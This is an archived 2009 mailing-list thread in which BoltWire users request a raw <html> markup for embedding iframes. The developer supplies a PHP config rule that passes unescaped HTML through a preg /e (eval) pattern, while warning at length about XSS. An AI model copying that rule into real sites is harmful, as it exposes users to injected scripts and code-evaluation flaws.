[request] How about a <html></html> syntax?
3 views
Skip to first unread message
Linly
Jan 28, 2009, 11:41:10 PM1/28/09
to BoltWire
Hi Dan,
While using TiddlyWiki, I've found there is a wiki syntax <html></
html> very useful. The syntax allowed user putting html code directly
into wiki pages and displayed it as is.
Sometimes if I want to embed some html code from Flickr or Google Maps
into wiki page, it would be easy to just copy and paste like this:
<html>
<iframe width="425" height="350" frameborder="0" scrolling="no"
marginheight="0" marginwidth="0" src="http://maps.google.com/maps?
f=q&source=s_q&hl=zh-
TW&geocode=&q=washington&sll=25.091075,121.559834&sspn=0.304706,0.564423&gl=tw&g=Taipei&ie=UTF8&ll=38.900385,-77.019825&spn=0.016367,0.035276&t=k&z=14&brcurrent=3,0x346ef3065c07572f:
0xe711f004bf9c5469&output=embed&s=AARTsJrSNCFJskwmMdDKr_R1Rr-
nQOuxEA"></iframe><br /><small><a href="http://maps.google.com/maps?
f=q&source=embed&hl=zh-
TW&geocode=&q=washington&sll=25.091075,121.559834&sspn=0.304706,0.564423&gl=tw&g=Taipei&ie=UTF8&ll=38.900385,-77.019825&spn=0.016367,0.035276&t=k&z=14&brcurrent=3,0x346ef3065c07572f:
0xe711f004bf9c5469" style="color:#0000FF;text-align:left">Bigger Map</
a></small>
</html>
Cheers,
linly
While using TiddlyWiki, I've found there is a wiki syntax <html></
html> very useful. The syntax allowed user putting html code directly
into wiki pages and displayed it as is.
Sometimes if I want to embed some html code from Flickr or Google Maps
into wiki page, it would be easy to just copy and paste like this:
<html>
<iframe width="425" height="350" frameborder="0" scrolling="no"
marginheight="0" marginwidth="0" src="http://maps.google.com/maps?
f=q&source=s_q&hl=zh-
TW&geocode=&q=washington&sll=25.091075,121.559834&sspn=0.304706,0.564423&gl=tw&g=Taipei&ie=UTF8&ll=38.900385,-77.019825&spn=0.016367,0.035276&t=k&z=14&brcurrent=3,0x346ef3065c07572f:
0xe711f004bf9c5469&output=embed&s=AARTsJrSNCFJskwmMdDKr_R1Rr-
nQOuxEA"></iframe><br /><small><a href="http://maps.google.com/maps?
f=q&source=embed&hl=zh-
TW&geocode=&q=washington&sll=25.091075,121.559834&sspn=0.304706,0.564423&gl=tw&g=Taipei&ie=UTF8&ll=38.900385,-77.019825&spn=0.016367,0.035276&t=k&z=14&brcurrent=3,0x346ef3065c07572f:
0xe711f004bf9c5469" style="color:#0000FF;text-align:left">Bigger Map</
a></small>
</html>
Cheers,
linly
The Editor
Jan 29, 2009, 8:17:40 AM1/29/09
to bolt...@googlegroups.com
Linly, how do they manage security on something like this? If you can
insert any html code on any writeable page you would have severe XSS
problems...
You can do something similar on BoltWire, just with a twist. First
copy your html code to a page like code.embed.flickr and then in your
wiki, anywhere, put <embed flickr> and it should work. I think this is
more secure because you can control who can edit, and even read all or
specific code.embed pages. Whereas I'm not sure how to make an html
markup like you suggest secure...
There's ways no doubt to do it. Drupal had something similar, but it
involved setting different levels of edit permissions based on user
status. I don't think I want to go down that path, as it would involve
a major reorganization of how the whole system works in BoltWire. It
might be worth thinking about some more, but I have my reservations...
Cheers,
Dan
insert any html code on any writeable page you would have severe XSS
problems...
You can do something similar on BoltWire, just with a twist. First
copy your html code to a page like code.embed.flickr and then in your
wiki, anywhere, put <embed flickr> and it should work. I think this is
more secure because you can control who can edit, and even read all or
specific code.embed pages. Whereas I'm not sure how to make an html
markup like you suggest secure...
There's ways no doubt to do it. Drupal had something similar, but it
involved setting different levels of edit permissions based on user
status. I don't think I want to go down that path, as it would involve
a major reorganization of how the whole system works in BoltWire. It
might be worth thinking about some more, but I have my reservations...
Cheers,
Dan
Linly
Jan 30, 2009, 12:31:18 AM1/30/09
to BoltWire
> Linly, how do they manage security on something like this? If you can
> insert any html code on any writeable page you would have severe XSS
> problems...
Yes, TiddlyWiki is a local-side wiki, it uses javascript to write data
> insert any html code on any writeable page you would have severe XSS
> problems...
into file only from PC file system like "c:\" or "D:\". If a
TiddlyWiki file, yes TiddlyWiki is a single file wiki, has been put
onto a web server, it become a read-only file. No one can change it
via "http://" method. The TiddlyWiki user always write their wiki
offline and upload it via ftp or other special php uploader.
> You can do something similar on BoltWire, just with a twist. First
> copy your html code to a page like code.embed.flickr and then in your
> wiki, anywhere, put <embed flickr> and it should work. I think this is
> more secure because you can control who can edit, and even read all or
> specific code.embed pages. Whereas I'm not sure how to make an html
> markup like you suggest secure...
> There's ways no doubt to do it. Drupal had something similar, but it
> involved setting different levels of edit permissions based on user
> status. I don't think I want to go down that path, as it would involve
> a major reorganization of how the whole system works in BoltWire. It
> might be worth thinking about some more, but I have my reservations...
the <html></html> as a config item, site admin can choose to open or
close the function? or limit it can be used in some certain groups?
Cheers,
linly
Shawn and Adriela Hoffman
Jan 30, 2009, 4:11:45 PM1/30/09
to bolt...@googlegroups.com
Having an optional <html></html> markup would be very helpful! I have wished for that so many times! I agree that it should be disabled by default and only enabled by an admin if they so desire. But I would really like that! I tried to make my own plugin awhile back to do that, but it didn't really work (because of my lack of php programming knowledge).
There are many times that I want to take a word document and put it on my website, but I don't want to have to go back through the whole document and reformat it with Boltwire markup, so I take the HTML and put it in and embed page and then put that into my markup. It would be so much nicer to be able to just have a <html></html> markup option.
So that's my vote! :-) an HTML markup would be a great option. And again, it should be disabled by default and only enabled by admins who know the risks.
It would only be a security risk if there are multiple people who can edit a website, right? And even then it would only be a risk if one of those people wanted to do damage. right? I am using Boltwire as a CMS and I am the only one who can log onto the website.
~Shawn
There are many times that I want to take a word document and put it on my website, but I don't want to have to go back through the whole document and reformat it with Boltwire markup, so I take the HTML and put it in and embed page and then put that into my markup. It would be so much nicer to be able to just have a <html></html> markup option.
So that's my vote! :-) an HTML markup would be a great option. And again, it should be disabled by default and only enabled by admins who know the risks.
It would only be a security risk if there are multiple people who can edit a website, right? And even then it would only be a risk if one of those people wanted to do damage. right? I am using Boltwire as a CMS and I am the only one who can log onto the website.
~Shawn
The Editor
Jan 30, 2009, 5:55:13 PM1/30/09
to bolt...@googlegroups.com
Just have a minute, but it seems we could do this easily enough in a
config file:
MarkUp('pre', 'html', '/<html>(.*?)<\/html>/se',
'BOLTescape(str_replace("<", "<", "$1"))'); // <html>
We could make it more sophisticated, but this ought to work. Just
tried a simple test, and it looks ok. But you need to really be
careful if you have ANYTHING on a site that is editable--like a
comment box or a sandbox or whatever. You will open yourself up to
the most wild of attacks. I mean even a title action or a member
registration form. You have to be VERY careful where and how you
allow access. Put it on a site and I could possibly hack into your
site in 5 minutes.
Of course, you can already put most html tags in BoltWire and they are
recognized. What is the problem with just dumping text in directly
with the html already? The <nolines></nolines> tag is supposed to take
care of the line break problem, though I admit the whole line break
thing needs to be revisited at some point... Hopefully soon... We
could work on a better html solution at that time if we wanted... But
limited html is more secure than full html.
Let me know if this doesn't work for you...
Dan
config file:
MarkUp('pre', 'html', '/<html>(.*?)<\/html>/se',
'BOLTescape(str_replace("<", "<", "$1"))'); // <html>
We could make it more sophisticated, but this ought to work. Just
tried a simple test, and it looks ok. But you need to really be
careful if you have ANYTHING on a site that is editable--like a
comment box or a sandbox or whatever. You will open yourself up to
the most wild of attacks. I mean even a title action or a member
registration form. You have to be VERY careful where and how you
allow access. Put it on a site and I could possibly hack into your
site in 5 minutes.
Of course, you can already put most html tags in BoltWire and they are
recognized. What is the problem with just dumping text in directly
with the html already? The <nolines></nolines> tag is supposed to take
care of the line break problem, though I admit the whole line break
thing needs to be revisited at some point... Hopefully soon... We
could work on a better html solution at that time if we wanted... But
limited html is more secure than full html.
Let me know if this doesn't work for you...
Dan
Linly
Jan 31, 2009, 10:07:15 AM1/31/09
to BoltWire
> Just have a minute, but it seems we could do this easily enough in a
> config file:
>
> MarkUp('pre', 'html', '/<html>(.*?)<\/html>/se',
> 'BOLTescape(str_replace("<", "<", "$1"))'); // <html>
Great Dan, I put this line in a group specified config file,
> config file:
>
> MarkUp('pre', 'html', '/<html>(.*?)<\/html>/se',
> 'BOLTescape(str_replace("<", "<", "$1"))'); // <html>
"config.photo.php", and it worked. Only the pages in photo group can
use this <html> markup, other group treat <html> as text not markup.
Great.
> ... We
> could work on a better html solution at that time if we wanted... But
> limited html is more secure than full html.
integrate a html editor, like TinyMCE, into BoltWire. The wysiwyg
editor is really useful for wiki newbies.
Cheers,
linly
The Editor
Feb 1, 2009, 3:09:12 PM2/1/09
to bolt...@googlegroups.com
> I like the "limited html" idea, in this way, it may be easy to
> integrate a html editor, like TinyMCE, into BoltWire. The wysiwyg
> editor is really useful for wiki newbies.
> integrate a html editor, like TinyMCE, into BoltWire. The wysiwyg
> editor is really useful for wiki newbies.
I like the idea of TinyMCE and I think it is something we could
probably manage. I've been looking at it the last few minutes. However
there are some serious security issues that would have to be resolved.
And to resolve them we would have to do some major backend coding to
handle the TinyMCE form submission. Here is a short but pointed post
on the subject.
http://wiki.moxiecode.com/index.php/TinyMCE_Talk:Security
BoltWire has a special session based authentication system for it's
form submissions--and it can't be simply dropped into TinyMCE. In
fact, I'm not sure how exactly to do it--probably would have to
reproduce the whole BoltWire security system into some kind of plugin.
But hey, anything is possible, and it would make a really nice
addition to BoltWire. Let's add it to the todo list and if I get
inspired one day I'll take a crack at it.
Cheers,
Dan
Reply all
Reply to author
Forward
0 new messages